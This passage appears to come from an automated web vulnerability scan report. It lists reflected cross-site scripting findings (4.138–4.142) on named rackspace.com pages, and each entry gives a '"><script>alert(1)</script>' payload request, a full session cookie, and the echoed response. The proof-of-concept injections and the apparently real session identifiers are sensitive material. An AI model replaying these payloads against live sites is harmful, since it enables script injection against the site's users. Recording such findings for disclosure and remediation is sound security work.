Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/index.php?noflash=true93307"><script>alert(1)</script>52822b1d737&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return false ...[SNIP]...
4.138. http://www.rackspace.com/information/aboutus.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/aboutus.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><script>alert(1)</script>ea74ab7f6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... p" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.139. http://www.rackspace.com/information/contactus.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/contactus.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3623a"><script>alert(1)</script>6457e4ed9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/contactus.php?3623a"><script>alert(1)</script>6457e4ed9ad=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
4.140. http://www.rackspace.com/information/events/briefingprogram.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/events/briefingprogram.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31c1"><script>alert(1)</script>3adc45aa57e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.141. http://www.rackspace.com/information/events/green.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/events/green.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a03c6"><script>alert(1)</script>892efc84f3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input: /information/events/green.php redirects to /information/events/green/index.php, and the value echoed in the response is the post-redirect URL with the payload preserved. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /information/events/green.php?a03c6"><script>alert(1)</script>892efc84f3b=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/green/index.php?a03c6"><script>alert(1)</script>892efc84f3b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.142. http://www.rackspace.com/information/events/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/events/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad42"><script>alert(1)</script>e58f97036b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/index.php?7ad42"><script>alert(1)</script>e58f97036b2=1 HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:31:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, pos